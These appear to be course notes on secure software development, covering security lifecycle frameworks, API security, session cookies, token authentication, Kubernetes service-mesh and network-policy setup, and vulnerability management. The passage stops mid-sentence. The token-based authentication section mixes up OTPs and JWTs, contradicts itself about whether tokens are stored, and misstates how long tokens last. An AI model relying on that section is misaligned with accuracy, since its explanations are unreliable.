6. Disposable Email Addresses:


- Discusses challenges in blocking disposable email addresses and
considerations for implementing sub-addressing.

UNIT 2
THE MICROSOFT SECURITY DEVELOPMENT LIFECYCLE

Microsoft SDL, or the Microsoft Security Development Lifecycle, is a robust


framework developed by Microsoft to help ensure that software products
developed by the company are designed, developed, and maintained with
security in mind. Here's a detailed explanation of the Microsoft SDL:

Overview:
The Microsoft SDL is a comprehensive approach to integrating security
throughout the entire software development lifecycle. It aims to reduce
vulnerabilities in software by addressing security at every phase of
development, from initial planning through to release and beyond.

Phases of Microsoft SDL:


1. Training & Requirements:
- Security Training: Developers and stakeholders undergo security training to
understand common vulnerabilities and secure coding practices.
- Security Requirements: Define security requirements early in the
development process to set expectations for security features and controls.

2. Design:
- Threat Modeling: Identify potential security threats and vulnerabilities
specific to the application or system being developed.
- Architecture & Design Reviews: Review the software architecture and
design from a security perspective to identify and mitigate potential
vulnerabilities.

3. Implementation:
- Secure Coding Guidelines: Follow established secure coding guidelines to
mitigate common vulnerabilities such as buffer overflows, injection attacks, etc.
- Code Review: Perform regular code reviews focused on security to identify
and fix vulnerabilities early in the development process.
- Static Analysis: Use automated tools to analyze source code for security
issues.

4. Verification:
- Security Testing: Conduct various types of security testing, including
penetration testing, fuzz testing, and vulnerability scanning, to identify and
remediate security weaknesses.
- Quality Assurance: Ensure that security requirements and best practices are
adhered to throughout the testing phase.

5. Release & Response:


- Security Signoff: Obtain security signoff before releasing the product to
ensure that all identified security issues have been addressed.
- Incident Response: Have a plan in place to respond to security incidents
quickly and effectively, including releasing patches and updates as needed.

6. Support & Maintenance:


- Security Updates: Provide timely security updates and patches throughout
the product lifecycle to address newly discovered vulnerabilities.
- Customer Guidance: Offer guidance and resources to customers on how to
securely deploy and configure the product.

Key Principles of Microsoft SDL:


- Security by Design: Integrate security considerations into every phase of
development rather than treating it as an afterthought.
- Risk Management: Identify and prioritize security risks based on potential
impact and likelihood.
- Comprehensive Approach: Combine multiple security activities (training,
testing, reviews) to address security holistically.
- Continuous Improvement: Learn from security incidents and feedback to
improve the SDL over time.

Benefits of Microsoft SDL:

- Reduced Vulnerabilities: Software developed using SDL tends to have fewer


security vulnerabilities.
- Improved Compliance: Helps in meeting regulatory and compliance
requirements related to software security.
- Enhanced Trust: Builds trust with customers by demonstrating a commitment
to security and privacy.
- Cost Savings: Reduces the cost of addressing security issues post-release by
catching them earlier in the development process.

Adoption:

- Microsoft SDL has been adopted not only within Microsoft for its own
products but also widely recommended as a best practice across the software
industry.
- Many organizations have adapted the principles of SDL to develop their own
secure development lifecycles tailored to their specific needs.
In conclusion, Microsoft SDL represents a proactive and structured approach to
integrating security into software development, aiming to create more secure
and reliable products that meet the highest standards of security and privacy.
OWASP CLASP

OWASP CLASP (Comprehensive, Lightweight Application Security Process)


represents a structured approach to integrating security into software
development processes. It aims to ensure that security measures are not an
afterthought but rather an integral part of the entire software lifecycle, from
inception to deployment and maintenance.
Views and Components of OWASP CLASP

1. Views:
OWASP CLASP is organized into five distinct views, each serving a specific
purpose in enhancing application security:

- Concepts View: Defines fundamental security concepts and principles that


developers and stakeholders need to understand.
- Role-Based View: Identifies roles and responsibilities within the
development team concerning security tasks and oversight.
- Activity-Assessment View: Provides a framework for assessing security-
related activities throughout the development lifecycle.
- Activity-Implementation View: Outlines specific security activities that
should be implemented during development to mitigate risks.
- Vulnerability View: Focuses on identifying and categorizing potential
vulnerabilities within software systems.

2. Vulnerability Use Cases:


OWASP CLASP utilizes vulnerability use cases to illustrate scenarios where
security vulnerabilities may occur. These use cases are based on traditional
component architectures like monolithic UNIX systems, mainframes, and
distributed architectures (HTTPS & TCP/IP). However, it acknowledges
potential gaps when applied to modern software architectures.

3. CLASP Taxonomy:
The taxonomy within OWASP CLASP categorizes security-related issues in
several dimensions:

- Problem Types: Classifies underlying issues causing vulnerabilities.


- Categories: Divides problem types into specific groups for diagnosis and
resolution.
- Exposure Periods: Identifies phases within the Software Development
Lifecycle (SDLC) where vulnerabilities might be introduced.
- Consequences: Describes the potential impacts and outcomes of exploited
vulnerabilities.
- Platforms and Languages: Specifies which platforms and programming
languages could be affected by identified vulnerabilities.
- Resources Required: Evaluates the resources and capabilities needed for
potential attacks.
- Risk Assessment: Assesses the severity and likelihood of vulnerabilities
being exploited.
- Avoidance and Mitigation Periods: Recommends phases within SDLC for
implementing preventive measures and countermeasures against vulnerabilities.

Integration and Application


OWASP CLASP encourages a proactive approach to security by embedding
security practices into the development lifecycle. It emphasizes structured,
repeatable, and measurable processes to ensure that security considerations are
addressed from the early stages of development onward. By integrating
OWASP CLASP, organizations can enhance the security posture of their
software products, mitigate risks associated with vulnerabilities, and build
confidence among stakeholders and end-users.

The significance and benefits of OWASP CLASP:

1. Holistic Security Approach: OWASP CLASP promotes a holistic approach to


application security by encompassing not just technical aspects but also
organizational processes and roles. This ensures that security is considered
comprehensively across all facets of software development and deployment.
2. Adaptability to Modern Architectures: While originally based on traditional
architectures, OWASP CLASP can be adapted and applied to modern software
architectures such as microservices, cloud-native applications, and IoT systems.
This adaptability underscores its relevance in contemporary software
development landscapes.
3. Measurable Security Practices: One of the strengths of OWASP CLASP lies
in its emphasis on measurability. By defining specific security activities and
roles, organizations can measure their adherence to these practices and track
improvements in their security posture over time.
4. Community and Resources: Being a part of OWASP (Open Web Application
Security Project), OWASP CLASP benefits from a rich community of security
professionals and resources. This community support provides access to best
practices, tools, and case studies that can aid in the successful implementation
of CLASP.
5. Compliance and Assurance: Adopting OWASP CLASP can assist
organizations in meeting regulatory compliance requirements related to
software security, thereby enhancing assurance and trust among clients, users,
and regulatory bodies.
6. Educational and Training Opportunities: OWASP CLASP offers educational
resources and training programs aimed at equipping developers and security
practitioners with the knowledge and skills needed to effectively implement
security measures throughout the SDLC.
7. Continuous Improvement: By integrating OWASP CLASP into their
development processes, organizations can foster a culture of continuous
improvement in security practices. This iterative approach helps in staying
ahead of emerging threats and evolving security challenges.

Overall, OWASP CLASP stands as a valuable framework for organizations


aiming to elevate their software security standards systematically and
sustainably. Its structured approach, coupled with community support and
adaptability, positions it as a cornerstone in modern application security
strategies.

Conclusion
In conclusion, OWASP CLASP serves as a comprehensive framework for
organizations looking to bolster the security of their software applications. By
leveraging its structured views, vulnerability use cases, and taxonomy,
development teams can systematically integrate security measures into their
workflows. This approach not only helps in identifying and addressing potential
vulnerabilities but also ensures that security becomes an inherent part of the
software development culture, fostering safer and more reliable software
products.

THE SOFTWARE ASSURANCE MATURITY MODEL


(SAMM): A COMPREHENSIVE

Overview
The Software Assurance Maturity Model (SAMM) is a structured framework
designed to help organizations assess and improve their software security
practices. Developed to address the increasing threat landscape surrounding
software systems, SAMM provides a roadmap for organizations to build and
enhance their software assurance programs systematically.

Structure of SAMM
SAMM consists of twelve Security Practices, each addressing critical aspects of
software security. These practices are divided into three maturity levels, each
level representing a higher degree of maturity and capability in implementing
secure software development practices. The three maturity levels are:
1. Level 1 - Initial: This level signifies basic ad-hoc practices without formal
processes in place. It's characterized by a reactive approach to security issues.
2. Level 2 - Managed: At this level, organizations begin to establish formalized
processes and policies for security. There's a more proactive approach to
identifying and addressing security concerns.
3. Level 3 - Optimizing: The highest level where organizations have mature,
well-defined processes that are continuously improved based on feedback and
metrics. This level aims for optimization and integration of security throughout
the software development lifecycle.
Assessment Methodology
Assessing an organization's maturity in SAMM involves evaluating its
adherence to each Security Practice across the three levels. SAMM provides
assessment worksheets for each practice, facilitating both lightweight and
detailed assessment approaches:
- Lightweight Assessment: Involves scoring based on predefined answers in the
assessment worksheets, providing a quick snapshot of current maturity levels.
- Detailed Assessment: Involves deeper audit and verification of practices,
including checking success metrics and ensuring that prescribed activities are in
place. This approach offers a more thorough understanding of an organization's
security posture.

Benefits of SAMM
Implementing SAMM offers several benefits to organizations:
- Structured Improvement: SAMM provides a structured approach to improving
software security, helping organizations move from reactive to proactive
security measures.
- Benchmarking: Enables organizations to benchmark their security practices
against industry standards and best practices.
- Risk Reduction: By improving software assurance practices, SAMM helps
mitigate security risks associated with software vulnerabilities and threats.
- Compliance and Assurance: Facilitates compliance with regulatory
requirements and enhances stakeholder assurance by demonstrating a
commitment to secure software development.

Practical Application
Organizations can utilize SAMM not only to assess their current security
posture but also to develop a roadmap for future improvements. By identifying
gaps and weaknesses in their security practices, organizations can prioritize
initiatives that will have the most significant impact on improving overall
software security.

Conclusion

In conclusion, SAMM is a powerful framework that empowers organizations to


enhance their software assurance capabilities systematically. By leveraging
SAMM's structured approach, organizations can achieve higher levels of
maturity in software security, reduce risks, and build more resilient software
systems. As the threat landscape continues to evolve, SAMM remains a
valuable tool for organizations committed to securing their software assets
effectively.
UNIT-3
API SECURITY

Understanding API Security


API (Application Programming Interface) security is crucial for protecting the
interactions between various software applications. It involves safeguarding the
data, resources, and operations facilitated by the API from unauthorized access
and malicious activities. Here’s why API security is important and how it can be
effectively implemented.
Why API Security is Necessary
1. User Access Control:
- APIs may be accessible to users with different levels of authority. For
example, some operations might only be available to administrators. Without
proper access controls, unauthorized users could perform restricted actions.
- APIs exposed to the internet are accessible to anyone, including malicious
users and bots. Proper security ensures that only legitimate users can access the
API.
2. Combination of Operations:
- Individual operations might be secure, but combinations of these operations
could create vulnerabilities. For example, a banking API might secure
withdrawal and deposit operations individually but fail to ensure that deposits
come from legitimate sources. A transfer operation that verifies both ends of a
transaction would be more secure.

3. Implementation Vulnerabilities:
- Poor implementation, such as not checking input sizes, can lead to
vulnerabilities like Denial of Service (DoS) attacks. Ensuring secure
implementation practices is essential for API security.

Elements of API Security


1. Assets
- Information Assets: Customer data (names, addresses, credit card
information), sensitive information (political affiliations, sexual orientation).
- Physical Assets: Servers, databases, and devices running the API.
- Anything valuable or that could cause harm if compromised should be
considered an asset.

2. Security Goals
- Confidentiality: Ensuring that data is accessible only to authorized users.
- Integrity: Preventing unauthorized creation, modification, or destruction of
data.
- Availability: Ensuring that the API remains accessible to legitimate users.
- Other goals include accountability (tracking user actions) and non-
repudiation (users cannot deny their actions).
3. Environments and Threat Models
- Threats: Events or circumstances that could compromise the API’s security
goals.
- Threat Modeling: The process of identifying and managing potential threats.
- Trust Boundaries: Areas within the system managed by the same entity.
Identifying data flows and trust boundaries helps in pinpointing where threats
might occur.
4. Common Security Mechanisms
- Authentication: Verifying the identity of users.
- Authorization: Ensuring users can only perform actions they are permitted
to.
- Input Validation: Checking data inputs to prevent malicious data from
compromising the API.
- Rate Limiting: Controlling the number of requests a user can make to
prevent abuse.
- Encryption: Protecting data in transit and at rest.

The STRIDE Threat Model


A popular method for identifying potential threats is the STRIDE model:
- Spoofing: Pretending to be someone else.
- Tampering: Altering data or settings unauthorizedly.
- Repudiation: Denying having performed an action.
- Information Disclosure: Revealing private information.
- Denial of Service (DoS): Preventing access to the API.
- Elevation of Privilege: Gaining access to unauthorized functionalities.

Designing Secure APIs


1. Planning and Design:
- Consider security from the start rather than adding it later.
- Use threat modeling to anticipate potential security issues.
2. Implementation:
- Follow secure coding practices.
- Regularly test for vulnerabilities and address them promptly.
3. Monitoring and Maintenance:
- Continuously monitor for security breaches.
- Update and patch the API regularly to address new threats.

Conclusion
API security is an ongoing process involving planning, implementation,
monitoring, and regular updates. By understanding the assets, defining security
goals, modeling threats, and applying appropriate security mechanisms, you can
protect your API from unauthorized access and malicious activities.

SESSION COOKIES
What are Session Cookies?
Session cookies are small pieces of data that a web server sends to a user's web
browser. These cookies are used to identify and manage the user's session,
which is the period during which the user interacts with the web application.
Session cookies are temporary and are typically deleted once the user closes
their browser.
Key Characteristics of Session Cookies
1. Temporary Storage: Session cookies are stored in the browser's memory and
are not saved on the user's device. They are deleted when the browser is closed.
2. Limited Lifetime: These cookies have a short lifespan, usually lasting only
for the duration of the user session.
3. Secure Handling: Session cookies can be configured to be sent only over
secure connections (HTTPS) and can be marked as HttpOnly to prevent access
via JavaScript, enhancing security.

How Session Cookies Work


1. User Authentication: When a user logs in, their credentials are verified, and if
correct, the server generates a session ID. This ID is sent to the user's browser in
the form of a session cookie.
2. Session Management: Each subsequent request from the user's browser
includes the session cookie, allowing the server to recognize the user and
maintain their session state.
3. Session Expiration: The session can expire either when the user logs out or
after a certain period of inactivity, depending on the server's configuration.

Usage in Token-Based Authentication


In token-based authentication systems, session cookies can be used to store the
authentication token:
1. Login: The user logs in by providing their credentials to a dedicated login
endpoint.
2. Token Issuance: Upon successful authentication, the server generates a time-
limited token and sends it to the browser as a session cookie.
3. Subsequent Requests: For each subsequent API request, the browser includes
the session cookie containing the token, which the server uses to authenticate
the request without needing to verify the user's credentials again.

Advantages of Using Session Cookies


1. Enhanced Security: By not storing passwords in each request and limiting the
session's lifespan, session cookies reduce the risk of credential exposure.
2. Performance Improvement: Since the server only verifies the user's
credentials once per session, it reduces the computational overhead associated
with password hashing on every request.
3. User Experience: Session cookies enable a smoother and more seamless user
experience, avoiding repeated login prompts and allowing for persistent logins
within the same session.

Preventing Cross-Site Request Forgery (CSRF)


To protect against CSRF attacks, where malicious websites can trick a user's
browser into making unauthorized requests, session cookies can be fortified
using several techniques:
1. SameSite Attribute: Setting the `SameSite` attribute of cookies to `Strict` or
`Lax` helps prevent cookies from being sent along with cross-site requests.
2. CSRF Tokens: Including CSRF tokens in forms and validating them on the
server ensures that requests originate from the legitimate site.
3. Secure and HttpOnly Flags: Marking cookies with the `Secure` flag ensures
they are only sent over HTTPS, and the `HttpOnly` flag prevents JavaScript
access, mitigating the risk of cross-site scripting (XSS) attacks.

Example Implementation in a Web Application


1. Login Endpoint: The user submits their username and password to `/login`.
2. Server Processing: The server verifies the credentials and generates a session
ID or token.
3. Cookie Setting: The server sets a session cookie with the token and attributes
like `Secure`, `HttpOnly`, and `SameSite`.
4. Authenticated Requests: The user's browser includes the session cookie in
subsequent requests, allowing the server to validate the session without
rechecking credentials.
5. Logout: When the user logs out, the server invalidates the session ID or
token, and the browser deletes the session cookie.

Session cookies are a fundamental component of web security and user session
management. They offer a balance between security and usability by
minimizing the need to repeatedly transmit sensitive information and enhancing
the user experience through persistent sessions. Properly configured, session
cookies can significantly bolster the security of web applications, especially
when combined with additional measures like CSRF tokens and secure cookie
attributes.
TOKEN-BASED AUTHENTICATION

Digital transformation brings security concerns for users to protect their


identity from bogus eyes. According to US Norton, on average 8 lakh accounts
are being hacked every year. There is a demand for high-security systems and
cybersecurity regulations for authentication.
Traditional methods rely on single-level authentication with username and
password to grant access to the web resources. Users tend to keep easy
passwords or reuse the same password on multiple platforms for their
convenience. The fact is, there is always a wrong eye on your web activities to
take unfair advantage in the future.
Due to the rising security load, two-factor authentication (2FA) come into the
picture and introduced Token-based authentication. This process reduces the
reliance on password systems and added a second layer to security. Let’s
straight jump on to the mechanism.
But first of all, let’s meet the main driver of the process: a T-O-K-E-N !!!
What is an Authentication Token?
A Token is a computer-generated code that acts as a digitally encoded
signature of a user. They are used to authenticate the identity of a user to
access any website or application network.
A token is classified into two types: A Physical token and a Web token. Let’s
understand them and how they play an important role in security.
• Physical token: A Physical token use a tangible device to store the
information of a user. Here, the secret key is a physical device that
can be used to prove the user’s identity. Two elements of physical
tokens are hard tokens and soft tokens. Hard tokens use smart cards
and USB to grant access to the restricted network like the one used in
corporate offices to access the employees. Soft tokens use mobile or
computer to send the encrypted code (like OTP) via authorized app
or SMS.
• Web token: The authentication via web token is a fully digital
process. Here, the server and the client interface interact upon the
user’s request. The client sends the user credentials to the server and
the server verifies them, generates the digital signature, and sends it
back to the client. Web tokens are popularly known as JSON Web
Token (JWT), a standard for creating digitally signed tokens.
A token is a popular word used in today’s digital climate. It is based on
decentralized cryptography. Some other token-associated terms are Defi
tokens, governance tokens, Non Fungible tokens, and security tokens. Tokens
are purely based on encryption which is difficult to hack.
What is a Token-based Authentication?
Token-based authentication is a two-step authentication strategy to enhance
the security mechanism for users to access a network. The users once register
their credentials, receive a unique encrypted token that is valid for a specified
session time. During this session, users can directly access the website or
application without login requirements. It enhances the user experience by
saving time and security by adding a layer to the password system.
A token is stateless as it does not save information about the user in the
database. This system is based on cryptography where once the session is
complete the token gets destroyed. So, it gets the advantage against hackers to
access resources using passwords.
The friendliest example of the token is OTP (One Time password) which is
used to verify the identity of the right user to get network entry and is valid for
30-60 seconds. During the session time, the token gets stored in the
organization’s database and vanishes when the session expired.
Let’s understand some important drivers of token-based authentication-
• User: A person who intends to access the network carrying his/her
username & password.
• Client-server: A client is a front-end login interface where the user
first interacts to enroll for the restricted resource.
• Authorization server: A backend unit handling the task of verifying
the credentials, generating tokens, and send to the user.
• Resource server: It is the entry point where the user enters the
access token. If verified, the network greets users with a welcome
note.
How does Token-based Authentication work?
Token-based authentication has become a widely used security mechanism
used by internet service providers to offer a quick experience to users while
not compromising the security of their data. Let’s understand how this
mechanism works with 4 steps that are easy to grasp.
How Token-based Authentication works?

1. Request: The user intends to enter the service with login credentials on the
application or the website interface. The credentials involve a username,
password, smartcard, or biometrics
2. Verification: The login information from the client-server is sent to the
authentication server for verification of valid users trying to enter the restricted
resource. If the credentials pass the verification the server generates a secret
digital key to the user via HTTP in the form of a code. The token is sent in a
JWT open standard format which includes-
• Header: It specifies the type of token and the signing algorithm.
• Payload: It contains information about the user and other data
• Signature: It verifies the authenticity of the user and the messages
transmitted.
3. Token validation: The user receives the token code and enters it into the
resource server to grant access to the network. The access token has a validity
of 30-60 seconds and if the user fails to apply it can request the Refresh token
from the authentication server. There’s a limit on the number of attempts a
user can make to get access. This prevents brute force attacks that are based on
trial and error methods.
4. Storage: Once the resource server validated the token and grants access to
the user, it stores the token in a database for the session time you define. The
session time is different for every website or app. For example, Bank
applications have the shortest session time of about a few minutes only.
So, here are the steps that clearly explain how token-based authentication
works and what are the main drivers driving the whole security process.
Note: Today, with growing innovations the security regulations are going to
be strict to ensure that only the right people have access to their resources. So,
tokens are occupying more space in the security process due to their ability to
tackle the store information in the encrypted form and work on both website
and application to maintain and scale the user experience. Hope the article
gave you all the know-how of token-based authentication and how it helps in
ensuring the crucial data is being misused.
SECURING NATTER APIS
SECURING MICROSERVICE APIS: SERVICE MESH

Overview
Securing microservice communications is crucial to prevent attackers from
intercepting and manipulating network traffic. Traditional network
segmentation techniques are not effective within dynamic Kubernetes
environments. Instead, using TLS (Transport Layer Security) and service
meshes like Linkerd or Istio can significantly enhance security.

Importance of Securing Communications


1. Prevent Data Interception: Even if containers are secure, attackers can still
intercept communications between services and databases.
2. Network Snooping Risks: Without segmentation, attackers can monitor all
internal communications, capturing sensitive data like passwords.
3. Mitigate Network Attacks: TLS helps prevent various network attacks such
as DNS rebind attacks, DNS cache poisoning, and ARP spoofing.

TLS and Public Key Infrastructure (PKI)


1. TLS Encryption: Ensures data is encrypted during transit, preventing
unauthorized access.
2. PKI Components:
- Certificates: Issued to services for establishing TLS connections.
- Private Keys: Kept secure to maintain the integrity of communications.
- Certificate Authority (CA): Issues and manages certificates. Can be a
hierarchy with root and intermediate CAs for enhanced security.
- Certificate Revocation: Certificates must be revoked if compromised,
managed via Certificate Revocation Lists (CRLs) or Online Certificate Status
Protocol (OCSP).

Challenges with Manual PKI


Managing a PKI manually is complex due to the need for secure key
distribution, certificate issuance, revocation, and renewal. Automated tools
like Cloudflare’s PKI toolkit and Hashicorp Vault can help but require
significant integration efforts.

Service Mesh for Simplified TLS Management


A service mesh simplifies the deployment and management of TLS in
Kubernetes. It provides a variety of benefits:
1. Proxy Sidecar Containers: Injected into each pod to handle TLS encryption
and decryption.
2. Automatic Certificate Management: The service mesh's control plane issues
and manages certificates for proxies.
3. Transparent Upgrades: Services communicate normally (e.g., via HTTP),
while the proxies automatically upgrade to HTTPS.

Installing and Configuring Linkerd


Linkerd is a simpler service mesh compared to Istio, making it suitable for
straightforward use cases:
1. Installation Steps:
- Install the Linkerd CLI.
- Run pre-installation checks (`linkerd check --pre`).
- Install Linkerd (`linkerd install | kubectl apply -f -`).
- Verify installation (`linkerd check`).

2. Enabling Linkerd in a Namespace:


- Add the `linkerd.io/inject: enabled` annotation to the namespace YAML
file.
- Apply the updated namespace definition.
- Restart deployments to inject Linkerd proxies.

3. Monitoring with Linkerd Tap:


- Use the `linkerd tap` command to monitor network requests and verify TLS
usage.

Example Configuration
To enable Linkerd for the Natter API, you would:
1. Update Namespace YAML:
```yaml
apiVersion: v1
kind: Namespace
metadata:
name: natter-api
labels:
name: natter-api
annotations:
linkerd.io/inject: enabled
```
- Apply the configuration: `kubectl apply -f kubernetes/natter-namespace.yaml`
- Restart deployments to enable sidecar injection:
```bash
kubectl rollout restart deployment natter-database-deployment -n natter-api
kubectl rollout restart deployment link-preview-deployment -n natter-api
kubectl rollout restart deployment natter-api-deployment -n natter-api
```

2. Monitor Traffic:
- Run `linkerd tap ns/natter-api` to observe network traffic and verify TLS
implementation.

Future Enhancements
Linkerd currently only upgrades HTTP traffic to use TLS. For other protocols,
manual TLS setup is required. However, Istio supports automatic TLS for non-
HTTP traffic and may be preferred for more complex environments.

Summary
Using a service mesh like Linkerd or Istio provides a robust solution for
securing microservice communications in Kubernetes environments. By
automating TLS encryption and certificate management, service meshes
ensure secure and reliable communication between services, greatly enhancing
the overall security posture of your microservice architecture.
SECURING MICROSERVICE APIS: LOCKING DOWN NETWORK
CONNECTIONS

When securing microservices in a Kubernetes cluster, enabling TLS ensures


that communications between services are encrypted, preventing
eavesdropping and tampering. However, TLS alone does not prevent
unauthorized access within the cluster. An attacker who compromises one
service could still attempt to access other services. This is known as lateral
movement. To mitigate this risk, network connections must be locked down
using network policies.

Understanding Lateral Movement

Lateral movement is the process where an attacker moves from one


compromised service to another within the network, attempting to expand their
control and find new vulnerabilities. This tactic can be explored further
through frameworks like [MITRE ATT&CK](https://attack.mitre.org).

Using Network Policies

Network policies in Kubernetes define which pods can communicate with each
other. These policies can control both ingress (incoming traffic) and egress
(outgoing traffic).

Key Components of a Network Policy:


1. Pod Selector: Specifies the pods the policy applies to.
2. Policy Types: Defines whether the policy controls ingress, egress, or both.
3. Ingress Rules: Specifies which pods or IP ranges can send traffic to the
selected pods and on which ports.
4. Egress Rules: Specifies where the selected pods can send traffic and on
which ports.

Example Network Policy

Consider a scenario where you need to secure the H2 database in the `natter-
api` namespace. The following network policy allows only the `natter-api`
pods to connect to the H2 database on port 9092 and blocks all outbound
connections from the database pod.

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: database-network-policy
namespace: natter-api
spec:
podSelector:
matchLabels:
app: natter-database
policyTypes:
- Ingress
- Egress
ingress:
- from:
- podSelector:
matchLabels:
app: natter-api
ports:
- protocol: TCP
port: 9092
```

Explanation:
- Pod Selector: Targets pods labeled `app: natter-database`.
- Policy Types: Applies both ingress and egress rules.
- Ingress Rule: Allows traffic to port 9092 from pods labeled `app: natter-api`.
- Egress Rule: Not defined, so all outgoing connections are blocked.

Applying Network Policies

To apply the network policy, use the `kubectl apply -f` command. However,
note that some environments like Minikube may not support network policies
out of the box. Most cloud providers (e.g., Google, Amazon, Microsoft) and
self-hosted Kubernetes clusters with network plugins like Calico or Cilium do
support these policies.

Enhancing Security with Service Mesh

In addition to network policies, service meshes like Istio offer advanced


network authorization. They can define policies based on the service identities
within mTLS (mutual TLS) certificates, allowing more granular control over
inter-service communications.

Advantages of Service Mesh Authorization:


- Controls access based on HTTP methods and paths.
- Enforces consistent security policies across the cluster.
Limitations:
- Does not replace API-level authorization mechanisms.
- Limited protection against Server-Side Request Forgery (SSRF) attacks, as
proxies authenticate requests transparently.

Conclusion

Locking down network connections is crucial for securing microservice APIs


in Kubernetes. By implementing network policies, you restrict which pods can
communicate with each other, reducing the risk of lateral movement by
attackers. For more advanced and granular control, consider integrating a
service mesh, which provides additional security features and network
authorization capabilities. Together, these measures help create a more secure
and resilient microservice architecture.

SECURING MICROSERVICE APIS: SECURING INCOMING


REQUESTS

Securing communications within a Kubernetes cluster is crucial, but it's


equally important to secure the requests entering the cluster from external
sources. This is typically achieved using an ingress controller, which acts as a
gateway for all external traffic. Below is a detailed guide on how to secure
incoming requests to your microservice APIs.

Understanding Ingress Controllers

Ingress Controller: A Kubernetes ingress controller is a reverse proxy or load


balancer that manages incoming requests from external clients. It provides a
unified API for multiple services and often functions as an API gateway,
performing tasks such as TLS termination, rate-limiting, and audit logging.

Benefits:
- TLS Termination: Encrypts incoming connections to secure data in transit.
- Rate-Limiting: Prevents abuse by limiting the number of requests from
clients.
- Audit Logging: Records requests for monitoring and troubleshooting.

Enabling an Ingress Controller in Minikube

To enable an ingress controller in Minikube, follow these steps:

1. Annotate the `kube-system` Namespace for mTLS:


Ensure the new ingress pod is part of the Linkerd service mesh for automatic
HTTPS upgrades.
```sh
kubectl annotate namespace kube-system linkerd.io/inject=enabled
```

2. Enable the Ingress Add-on:


Start the NGINX ingress controller within Minikube.
```sh
minikube addons enable ingress
```

3. Monitor the Ingress Controller Pod:


Check the progress of the ingress controller starting up.
```sh
kubectl get pods -n kube-system --watch
```

Configuring the Ingress Controller

Create an Ingress resource to route requests to your services and enable TLS:

1. Create the Ingress Configuration File:


Define how HTTP requests should be mapped to services within your
namespace.
```yaml
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: api-ingress
namespace: natter-api
annotations:
nginx.ingress.kubernetes.io/upstream-vhost:
"$service_name.$namespace.svc.cluster.local:$service_port"
spec:
tls:
- hosts:
- api.natter.local
secretName: natter-tls
rules:
- host: api.natter.local
http:
paths:
- backend:
serviceName: natter-api-service
servicePort: 4567
```

2. Generate TLS Certificates:


Use `mkcert` to create a TLS certificate for development.
```sh
mkcert api.natter.local
```

3. Create a Kubernetes Secret for the Certificate:


Store the TLS certificate and key in a Kubernetes secret.
```sh
kubectl create secret tls natter-tls -n natter-api --key=api.natter.local-key.pem --
cert=api.natter.local.pem
```

4. Apply the Ingress Configuration:


Deploy the ingress configuration to the cluster.
```sh
kubectl apply -f kubernetes/natter-ingress.yaml
```

Verifying the Setup

Make an HTTPS request to the API to ensure it is secured:


```sh
curl https://api.natter.local/users -H 'Content-Type: application/json' -d
'{"username":"abcde","password":"password"}'
```
You should receive a response indicating the request was successful.

Checking the Status with Linkerd

Use Linkerd's tap utility to verify that the requests are secured with mTLS:
```sh
linkerd tap ns/natter-api
```

Look for the `tls=true` flag in the output to confirm that mTLS is enabled.

Automating Certificate Management in Production

For production environments, consider using `cert-manager` to automate


certificate management:
- Obtain certificates from public CAs like Let’s Encrypt or from private
organizational CAs.
- Automatically renew and manage certificates without manual intervention.

Summary

By configuring an ingress controller, you ensure that incoming requests to


your Kubernetes cluster are effectively managed and secured. The ingress
controller can handle TLS termination, route requests to the appropriate
services, and enforce security measures such as rate-limiting and audit
logging. Integrating the ingress controller with a service mesh like Linkerd
further enhances security by enabling mTLS for internal communications. This
comprehensive approach to securing incoming requests helps protect your
microservices from external threats while maintaining robust internal security
controls.
UNIT-4

VULNERABILITY ASSESSMENT LIFECYCLE

Every month, the National Institute of Standards and Technology (NIST) adds
over 2,000 new security vulnerabilities to the National Vulnerability Database.
Security teams don’t need to track all of these vulnerabilities, but they do need a
way to identify and resolve the ones that pose a potential threat to their systems.
That’s what the vulnerability management lifecycle is for.
The vulnerability management lifecycle is a continuous process for discovering,
prioritizing and addressing vulnerabilities in a company’s IT assets.
A typical round of the lifecycle has five stages:
1. Asset inventory and vulnerability assessment.
2. Vulnerability prioritization.
3. Vulnerability resolution.
4. Verification and monitoring.
5. Reporting and improvement.
The vulnerability management lifecycle allows organizations to improve
security posture by taking a more strategic approach to vulnerability
management. Instead of reacting to new vulnerabilities as they appear, security
teams actively hunt for flaws in their systems. Organizations can identify the
most critical vulnerabilities and put protections in place before threat actors’
strike.

Why does the vulnerability management lifecycle matter?


A vulnerability is any security weakness in the structure, function or
implementation of a network or asset that hackers can exploit to harm a
company.
Vulnerabilities can arise from fundamental flaws in an asset’s construction.
Such was the case with the infamous Log4J vulnerability, where coding errors
in a popular Java library allowed hackers to remotely run malware on victims’
computers. Other vulnerabilities are caused by human error, like a
misconfigured cloud storage bucket that exposes sensitive data to the public
internet.
Every vulnerability is a risk for organizations. According to IBM’s X-Force
Threat Intelligence Index, vulnerability exploitation is the second most
common cyberattack vector. X-Force also found that the number of new
vulnerabilities increases every year, with 23,964 recorded in 2022 alone.
Hackers have a growing stockpile of vulnerabilities at their disposal. In
response, enterprises have made vulnerability management a key component of
their cyber risk management strategies. The vulnerability management lifecycle
offers a formal model for effective vulnerability management programs in an
ever-changing cyberthreat landscape. By adopting the lifecycle, organizations
can see some of the following benefits:
• Proactive vulnerability discovery and resolution: Businesses often
don’t know about their vulnerabilities until hackers have exploited them.
The vulnerability management lifecycle is built around continuous
monitoring so security teams can find vulnerabilities before adversaries
do.
• Strategic resource allocation: Tens of thousands of new vulnerabilities
are discovered yearly, but only a few are relevant to an organization. The
vulnerability management lifecycle helps enterprises pinpoint the most
critical vulnerabilities in their networks and prioritize the biggest risks for
remediation.
• A more consistent vulnerability management process: The
vulnerability management lifecycle gives security teams a repeatable
process to follow, from vulnerability discovery to remediation and
beyond. A more consistent process produces more consistent results, and
it enables companies to automate key workflows like asset inventory,
vulnerability assessment and patch management.

Stages of the vulnerability management lifecycle


New vulnerabilities can arise in a network at any time, so the vulnerability
management lifecycle is a continuous loop rather than a series of distinct events.
Each round of the lifecycle feeds directly into the next. A single round usually
contains the following stages:

Stage 0: Planning and prework


Technically, planning and prework happen before the vulnerability management
lifecycle, hence the “Stage 0” designation. During this stage, the organization
irons out critical details of the vulnerability management process, including the
following:
• Which stakeholders will be involved, and the roles they will have
• Resources—including people, tools, and funding—available for
vulnerability management
• General guidelines for prioritizing and responding to vulnerabilities
• Metrics for measuring the program’s success
Organizations don’t go through this stage before every round of the lifecycle.
Generally, a company conducts an extensive planning and prework phase before
it launches a formal vulnerability management program. When a program is in
